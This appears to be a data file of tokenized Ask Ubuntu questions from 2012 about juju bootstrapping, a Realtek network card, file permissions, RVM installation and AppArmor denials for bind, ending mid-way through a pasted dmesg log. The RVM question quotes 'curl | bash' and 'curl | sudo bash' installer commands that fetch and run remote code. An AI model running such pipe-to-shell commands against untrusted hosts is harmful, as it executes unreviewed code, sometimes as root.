172011	`` no matching node is available . '' error when trying to bootstrap juju	this is my error while doing bootstrap , the status of nodes i added were declared and now i have accept and commising and it says comminsing started , i need help please .. clusteruser @ cluster : ~ $ juju status 2012-08-04 22:27:03,367 info connecting to environment ... 2012-08-04 22:27:04,945 error juju environment not found : is the environment bootstrapped ? clusteruser @ cluster : ~ $ juju bootstrap 2012-08-04 22:27:10,493 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2012-08-04 22:27:10,923 error no matching node is available .
172013	realtek semiconductor co. , ltd. rtl8101e/rtl8102e	i had ubuntu 11.10 and in the last few weeks i experienced an obscure problem : after i had the computer running for a few days i could no longer connect to google.com or anything related to google . all sites worked with all browsers ( firefox , chrome , opera ) except google . it remained in the connecting phase for a few minutes and either timed out or finally connected with this huge delay . even if i entered other sites such as this one , if it had anything to do with google such adsense or gstatic or whatever with g in it , that site took a long time to load waiting in connecting to gstatic.com . anything google related took minutes to work , but everything else worked instantly ! i tried rebooting or using other machine ( with windows on it ) and this worked , so it 's not network related . but after a few days it started not working again ... so i upgraded to the precise pangolin hoping this behavior would go away . it did n't ! after a few days i get the same behavior as in 11.10 . what am i supposed to do ? reboot every other day ? i did n't have this problem with neither 10.10 or 11.04 . i found the realtek rtl8168/8111e issue with the r8169 driver but this is not exactly the same card so probably trying r8168 wo n't help . ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) subsystem : toshiba america info systems device ff1c flags : bus master , fast devsel , latency 0 , irq 44 i/o ports at 4000 [ size=256 ] memory at d0010000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0000000 ( 64-bit , prefetchable ) [ size=64k ] capabilities : [ 40 ] power management version 7 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ ac ] msi-x : enable- count=2 masked- capabilities : [ cc ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 09-00-00-00-ff-ff-00-00 kernel driver in use : r8169 kernel modules : r8169
172017	how can i add file create read write and delete for a specific user ?	question : i need to give file create , read , write and delete access to /var/log for user bind only . how can i do that , short of allowing read and write and delete access for everybody ?
172021	which programming-model does ubuntu follow ?	i am curious to know which programming model does the ubuntu follows in its own development process ; does it follow the object-oriented programming model ( and use languages like python , java etc ) or does it follows the traditional procedural programming model ( languages like c , asm ) .
172024	macbook : to dual boot or to run on a virtual machine ?	just posting this question to ask this : which is better , dual booting a macbook ( mid 2007 2,1 model ) with ubuntu ( latest supported release 12.04 ) or is it just as good using a virtual machine such as virtual box or parallels ?
172026	backup all home folders on usb disk and accessibility	i am using ubuntu 12.04 and have multiple family members working on it with there own home folder . i have an usb disk and want to use it to backup my home folders . trying this , i got some questions . when my disk auto mount , it is not visible for each user . it seams to be visible for the user the time i connect the usb disk . i want to create one folder per home on the usb disk to backup the data to . but when i format the disk in ext4 or fat for example it is read only . how can i format the disk so it is accessible to every user . best regards , patrick
172028	single user rvm needs sudo , and adding users to rvm group	i am following the instructions on the rvm site . first , i tried to install for single users : $ curl -l https : //get.rvm.io | bash -s stable % total % received % xferd average speed time time time current dload upload total spent left speed 100 185 100 185 0 0 35 0 0:00:05 0:00:05 -- : -- : -- 280 100 9439 100 9439 0 0 1602 0 0:00:05 0:00:05 -- : -- : -- 30642 mkdir : can not create directory `/usr/share/ruby-rvm ' : permission denied are the instructions on the site wrong ? can someone on the rvm team either correct their install file or change the directions ? then , i tried the multi-user install $ curl -l https : //get.rvm.io | sudo bash -s stable % total % received % xferd average speed time time time current dload upload total spent left speed 100 185 100 185 0 0 36 0 0:00:05 0:00:05 -- : -- : -- 298 100 9439 100 9439 0 0 864 0 0:00:10 0:00:10 -- : -- : -- 23192 downloading rvm from wayneeseguin branch stable % total % received % xferd average speed time time time current dload upload total spent left speed 100 125 100 125 0 0 199 0 -- : -- : -- -- : -- : -- -- : -- : -- 441 100 1046k 100 1046k 0 0 198k 0 0:00:05 0:00:05 -- : -- : -- 262k installing rvm to /usr/share/ruby-rvm/ rvm system user group 'rvm ' exists , proceeding with installation . # rvm : shell scripts enabling management of multiple ruby environments . # rtfm : https : //rvm.io/ # help : http : //webchat.freenode.net/ ? channels=rvm ( # rvm on irc.freenode.net ) # cheatsheet : http : //cheat.errtheblog.com/s/rvm/ # screencast : http : //screencasts.org/episodes/how-to-use-rvm # in case of any issues read output of 'rvm requirements ' and/or 'rvm notes' installation of rvm in /usr/share/ruby-rvm/ is almost complete : * first you need to add all users that will be using rvm to 'rvm ' group , and logout - login again , anyone using rvm will be operating with `umask g+w` . * to start using rvm you need to run `source /etc/profile.d/rvm.sh` in all your open shell windows , in rare cases you need to reopen all shell windows . # big , # # thank you for using rvm ! # i sincerely hope that rvm helps to make your life easier and more enjoyable ! ! ! # # ~wayne rvm 1.14.11 ( stable ) by wayne e. seguin < wayneeseguin @ gmail.com > , michal papis < mpapis @ gmail.com > [ https : //rvm.io/ ] i am a little suspicious because the directions did n't mention anything about adding users . where are the directions for adding users to the rvm group ?
172030	how to allow bind in app armor ?	question : i did setup bind9 as described here : http : //ubuntuforums.org/showthread.php ? p=12149576 # post12149576 now i have a little problem with apparmor : if i switch it off , it works . if apparmor runs , it does n't work , and i get the following dmesg output : [ 23.809767 ] type=1400 audit ( 1344097913.519:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1540 comm= '' apparmor_parser '' [ 23.811537 ] type=1400 audit ( 1344097913.519:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1540 comm= '' apparmor_parser '' [ 23.812514 ] type=1400 audit ( 1344097913.523:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1540 comm= '' apparmor_parser '' [ 23.821999 ] type=1400 audit ( 1344097913.531:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld '' pid=1544 comm= '' apparmor_parser '' [ 23.845085 ] type=1400 audit ( 1344097913.555:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/libvirtd '' pid=1543 comm= '' apparmor_parser '' [ 23.849051 ] type=1400 audit ( 1344097913.559:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/named '' pid=1545 comm= '' apparmor_parser '' [ 23.849509 ] type=1400 audit ( 1344097913.559:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=1542 comm= '' apparmor_parser '' [ 23.851597 ] type=1400 audit ( 1344097913.559:18 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=1547 comm= '' apparmor_parser '' [ 24.415193 ] type=1400 audit ( 1344097914.123:19 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=1625 comm= '' apparmor_parser '' [ 24.738631 ] ip_tables : ( c ) 2000-2006 netfilter core team [ 25.005242 ] nf_conntrack version 0.5.0 ( 16384 buckets , 65536 max ) [ 25.187939 ] addrconf ( netdev_up ) : virbr0 : link is not ready [ 26.004282 ] ebtables v2.0 registered [ 26.068783 ] ip6_tables : ( c ) 2000-2006 netfilter core team [ 28.158848 ] postgres ( 1900 ) : /proc/1900/oom_adj is deprecated , please use /proc/1900/oom_score_adj instead . [ 29.840079 ] xenbr0 : no ipv6 routers present [ 31.502916 ] type=1400 audit ( 1344097919.088:20 ) : apparmor= '' denied '' operation= '' mknod '' parent=1984 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=1989 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 34.336141 ] xenbr0 : port 1 ( eth0 ) entering forwarding state [ 38.424359 ] event-channel device installed . [ 38.853077 ] xenbus : unable to read cpu state [ 38.854215 ] xenbus : unable to read cpu state [ 38.855231 ] xenbus : unable to read cpu state [ 38.858891 ] xenbus : unable to read cpu state [ 47.411497 ] device vif1.0 entered promiscuous mode [ 47.429245 ] addrconf ( netdev_up ) : vif1.0 : link is not ready [ 49.366219 ] virbr0 : port 1 ( vif1.0 ) entering disabled state [ 49.366705 ] virbr0 : port 1 ( vif1.0 ) entering disabled state [ 49.368873 ] virbr0 : mixed no checksumming and other settings . [ 97.273028 ] type=1400 audit ( 1344097984.861:21 ) : apparmor= '' denied '' operation= '' mknod '' parent=3076 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3078 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 277.790627 ] type=1400 audit ( 1344098165.377:22 ) : apparmor= '' denied '' operation= '' mknod '' parent=3384 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3389 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 287.812986 ] type=1400 audit ( 1344098175.401:23 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /root/tmp-gjnx0c0dda '' pid=3400 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 287.818466 ] type=1400 audit ( 1344098175.405:24 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /root/tmp-cpoth52qu5 '' pid=3400 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 323.166228 ] type=1400 audit ( 1344098210.753:25 ) : apparmor= '' denied '' operation= '' mknod '' parent=3422 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3427 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 386.512586 ] type=1400 audit ( 1344098274.101:26 ) : apparmor= '' denied '' operation= '' mknod '' parent=3456 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3459 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 808.549049 ] type=1400 audit ( 1344098696.137:27 ) : apparmor= '' denied '' operation= '' mknod '' parent=3872 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3877 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 894.671081 ] type=1400 audit ( 1344098782.257:28 ) : apparmor= '' denied '' operation= '' mknod '' parent=3922 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3927 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 968.514669 ] type=1400 audit ( 1344098856.101:29 ) : apparmor= '' denied '' operation= '' mknod '' parent=3978 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=3983 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1021.814582 ] type=1400 audit ( 1344098909.401:30 ) : apparmor= '' denied '' operation= '' mknod '' parent=4010 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4012 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1063.856633 ] type=1400 audit ( 1344098951.445:31 ) : apparmor= '' denied '' operation= '' mknod '' parent=4041 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4043 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1085.404001 ] type=1400 audit ( 1344098972.989:32 ) : apparmor= '' denied '' operation= '' mknod '' parent=4072 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4077 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1108.207402 ] type=1400 audit ( 1344098995.793:33 ) : apparmor= '' denied '' operation= '' mknod '' parent=4102 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4107 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1156.947189 ] type=1400 audit ( 1344099044.533:34 ) : apparmor= '' denied '' operation= '' mknod '' parent=4134 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4136 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1166.768005 ] type=1400 audit ( 1344099054.353:35 ) : apparmor= '' denied '' operation= '' mknod '' parent=4150 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4155 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1168.873385 ] type=1400 audit ( 1344099056.461:36 ) : apparmor= '' denied '' operation= '' mknod '' parent=4162 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4167 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1181.558946 ] type=1400 audit ( 1344099069.145:37 ) : apparmor= '' denied '' operation= '' mknod '' parent=4177 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4182 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 1199.349265 ] type=1400 audit ( 1344099086.937:38 ) : apparmor= '' denied '' operation= '' mknod '' parent=4191 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4196 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 1296.805604 ] type=1400 audit ( 1344099184.393:39 ) : apparmor= '' denied '' operation= '' mknod '' parent=4232 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4237 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1317.730568 ] type=1400 audit ( 1344099205.317:40 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-nubes0ixwi '' pid=4251 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1317.730744 ] type=1400 audit ( 1344099205.317:41 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-zdja06zoku '' pid=4252 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1365.072687 ] type=1400 audit ( 1344099252.661:42 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-ensuyurgoc '' pid=4290 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1365.074520 ] type=1400 audit ( 1344099252.661:43 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-lvcnpwostp '' pid=4287 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1380.336984 ] type=1400 audit ( 1344099267.925:44 ) : apparmor= '' denied '' operation= '' mknod '' parent=4617 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4622 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1437.924534 ] type=1400 audit ( 1344099325.513:45 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-uyf1dhizuu '' pid=4648 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1437.924626 ] type=1400 audit ( 1344099325.513:46 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /tmp-oabxwclii3 '' pid=4647 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1526.334959 ] type=1400 audit ( 1344099413.921:47 ) : apparmor= '' denied '' operation= '' mknod '' parent=4749 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4754 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 1601.292548 ] type=1400 audit ( 1344099488.881:48 ) : apparmor= '' denied '' operation= '' mknod '' parent=4835 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4840 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 1639.543733 ] type=1400 audit ( 1344099527.129:49 ) : apparmor= '' denied '' operation= '' mknod '' parent=4905 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4907 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1916.381179 ] type=1400 audit ( 1344099803.969:50 ) : apparmor= '' denied '' operation= '' mknod '' parent=4959 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4961 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 1940.816898 ] type=1400 audit ( 1344099828.405:51 ) : apparmor= '' denied '' operation= '' mknod '' parent=4991 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=4996 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 2043.010898 ] type=1400 audit ( 1344099930.597:52 ) : apparmor= '' denied '' operation= '' mknod '' parent=5048 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=5053 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=107 ouid=107 [ 2084.956230 ] type=1400 audit ( 1344099972.545:53 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /var/log/tmp-xygr33rqut '' pid=5069 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 2084.959120 ] type=1400 audit ( 1344099972.545:54 ) : apparmor= '' denied '' operation= '' mknod '' parent=3325 profile= '' /usr/sbin/named '' name= '' /var/log/tmp-vo24rhwl14 '' pid=5066 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 2088.169500 ] type=1400 audit ( 1344099975.757:55 ) : apparmor= '' denied '' operation= '' mknod '' parent=5076 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=5078 comm= '' named '' requested_mask= '' c '' denied_mask= '' c '' fsuid=0 ouid=0 [ 2165.625096 ] type=1400 audit ( 1344100053.213:56 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /sbin/dhclient '' pid=5124 comm= '' apparmor '' [ 2165.625401 ] type=1400 audit ( 1344100053.213:57 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=5124 comm= '' apparmor '' [ 2165.625608 ] type=1400 audit ( 1344100053.213:58 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=5124 comm= '' apparmor '' [ 2165.625782 ] type=1400 audit ( 1344100053.213:59 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=5124 comm= '' apparmor '' [ 2165.625931 ] type=1400 audit ( 1344100053.213:60 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/libvirtd '' pid=5124 comm= '' apparmor '' [ 2165.626057 ] type=1400 audit ( 1344100053.213:61 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/mysqld '' pid=5124 comm= '' apparmor '' [ 2165.626181 ] type=1400 audit ( 1344100053.213:62 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/named '' pid=5124 comm= '' apparmor '' [ 2165.626319 ] type=1400 audit ( 1344100053.213:63 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/tcpdump '' pid=5124 comm= '' apparmor '' [ 3709.583927 ] type=1400 audit ( 1344101597.169:64 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/libvirtd '' pid=7484 comm= '' apparmor_parser '' [ 3709.839895 ] type=1400 audit ( 1344101597.425:65 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld '' pid=7485 comm= '' apparmor_parser '' [ 3710.008892 ] type=1400 audit ( 1344101597.597:66 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=7483 comm= '' apparmor_parser '' [ 3710.545232 ] type=1400 audit ( 1344101598.133:67 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/named '' pid=7486 comm= '' apparmor_parser '' [ 3710.655600 ] type=1400 audit ( 1344101598.241:68 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=7481 comm= '' apparmor_parser '' [ 3710.656013 ] type=1400 audit ( 1344101598.241:69 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=7481 comm= '' apparmor_parser '' [ 3710.656786 ] type=1400 audit ( 1344101598.245:70 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=7481 comm= '' apparmor_parser '' [ 3710.832624 ] type=1400 audit ( 1344101598.421:71 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=7488 comm= '' apparmor_parser '' [ 3717.573123 ] type=1400 audit ( 1344101605.161:72 ) : apparmor= '' denied '' operation= '' open '' parent=7505 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=7510 comm= '' named '' requested_mask= '' ac '' denied_mask= '' ac '' fsuid=107 ouid=0 [ 3743.667808 ] type=1400 audit ( 1344101631.253:73 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /sbin/dhclient '' pid=7552 comm= '' apparmor '' [ 3743.668338 ] type=1400 audit ( 1344101631.257:74 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=7552 comm= '' apparmor '' [ 3743.668625 ] type=1400 audit ( 1344101631.257:75 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=7552 comm= '' apparmor '' [ 3743.668834 ] type=1400 audit ( 1344101631.257:76 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=7552 comm= '' apparmor '' [ 3743.668991 ] type=1400 audit ( 1344101631.257:77 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/libvirtd '' pid=7552 comm= '' apparmor '' [ 3743.669127 ] type=1400 audit ( 1344101631.257:78 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/mysqld '' pid=7552 comm= '' apparmor '' [ 3743.669282 ] type=1400 audit ( 1344101631.257:79 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/named '' pid=7552 comm= '' apparmor '' [ 3743.669520 ] type=1400 audit ( 1344101631.257:80 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/tcpdump '' pid=7552 comm= '' apparmor '' [ 3873.572336 ] type=1400 audit ( 1344101761.161:81 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/libvirtd '' pid=7722 comm= '' apparmor_parser '' [ 3873.826209 ] type=1400 audit ( 1344101761.413:82 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld '' pid=7723 comm= '' apparmor_parser '' [ 3873.988181 ] type=1400 audit ( 1344101761.577:83 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=7721 comm= '' apparmor_parser '' [ 3874.520305 ] type=1400 audit ( 1344101762.109:84 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=7719 comm= '' apparmor_parser '' [ 3874.520736 ] type=1400 audit ( 1344101762.109:85 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=7719 comm= '' apparmor_parser '' [ 3874.521000 ] type=1400 audit ( 1344101762.109:86 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=7719 comm= '' apparmor_parser '' [ 3874.528878 ] type=1400 audit ( 1344101762.117:87 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/named '' pid=7724 comm= '' apparmor_parser '' [ 3874.930712 ] type=1400 audit ( 1344101762.517:88 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/tcpdump '' pid=7726 comm= '' apparmor_parser '' [ 3971.744599 ] type=1400 audit ( 1344101859.333:89 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/libvirtd '' pid=7899 comm= '' apparmor_parser '' [ 3972.009857 ] type=1400 audit ( 1344101859.597:90 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=7900 comm= '' apparmor_parser '' [ 3972.165297 ] type=1400 audit ( 1344101859.753:91 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=7898 comm= '' apparmor_parser '' [ 3972.587766 ] type=1400 audit ( 1344101860.173:92 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/named '' pid=7901 comm= '' apparmor_parser '' [ 3972.847189 ] type=1400 audit ( 1344101860.433:93 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=7896 comm= '' apparmor_parser '' [ 3972.847705 ] type=1400 audit ( 1344101860.433:94 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=7896 comm= '' apparmor_parser '' [ 3972.848150 ] type=1400 audit ( 1344101860.433:95 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=7896 comm= '' apparmor_parser '' [ 3973.147889 ] type=1400 audit ( 1344101860.733:96 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/tcpdump '' pid=7903 comm= '' apparmor_parser '' [ 3988.863999 ] type=1400 audit ( 1344101876.449:97 ) : apparmor= '' denied '' operation= '' open '' parent=7939 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=7944 comm= '' named '' requested_mask= '' ac '' denied_mask= '' ac '' fsuid=107 ouid=0 [ 4025.826132 ] type=1400 audit ( 1344101913.413:98 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /sbin/dhclient '' pid=7975 comm= '' apparmor '' [ 4025.826627 ] type=1400 audit ( 1344101913.413:99 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=7975 comm= '' apparmor '' [ 4025.826861 ] type=1400 audit ( 1344101913.413:100 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=7975 comm= '' apparmor '' [ 4025.827059 ] type=1400 audit ( 1344101913.413:101 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=7975 comm= '' apparmor '' [ 4025.827214 ] type=1400 audit ( 1344101913.413:102 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/libvirtd '' pid=7975 comm= '' apparmor '' [ 4025.827352 ] type=1400 audit ( 1344101913.413:103 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/mysqld '' pid=7975 comm= '' apparmor '' [ 4025.827485 ] type=1400 audit ( 1344101913.413:104 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/named '' pid=7975 comm= '' apparmor '' [ 4025.827624 ] type=1400 audit ( 1344101913.413:105 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/tcpdump '' pid=7975 comm= '' apparmor '' [ 4027.862198 ] type=1400 audit ( 1344101915.449:106 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/libvirtd '' pid=8090 comm= '' apparmor_parser '' [ 4039.500920 ] audit_printk_skb : 21 callbacks suppressed [ 4039.500932 ] type=1400 audit ( 1344101927.089:114 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /sbin/dhclient '' pid=8114 comm= '' apparmor '' [ 4039.501413 ] type=1400 audit ( 1344101927.089:115 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=8114 comm= '' apparmor '' [ 4039.501672 ] type=1400 audit ( 1344101927.089:116 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=8114 comm= '' apparmor '' [ 4039.501861 ] type=1400 audit ( 1344101927.089:117 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=8114 comm= '' apparmor '' [ 4039.502033 ] type=1400 audit ( 1344101927.089:118 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/libvirtd '' pid=8114 comm= '' apparmor '' [ 4039.502170 ] type=1400 audit ( 1344101927.089:119 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/mysqld '' pid=8114 comm= '' apparmor '' [ 4039.502305 ] type=1400 audit ( 1344101927.089:120 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/named '' pid=8114 comm= '' apparmor '' [ 4039.502442 ] type=1400 audit ( 1344101927.089:121 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/tcpdump '' pid=8114 comm= '' apparmor '' [ 4041.425405 ] type=1400 audit ( 1344101929.013:122 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=8240 comm= '' apparmor_parser '' [ 4041.425952 ] type=1400 audit ( 1344101929.013:123 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=8238 comm= '' 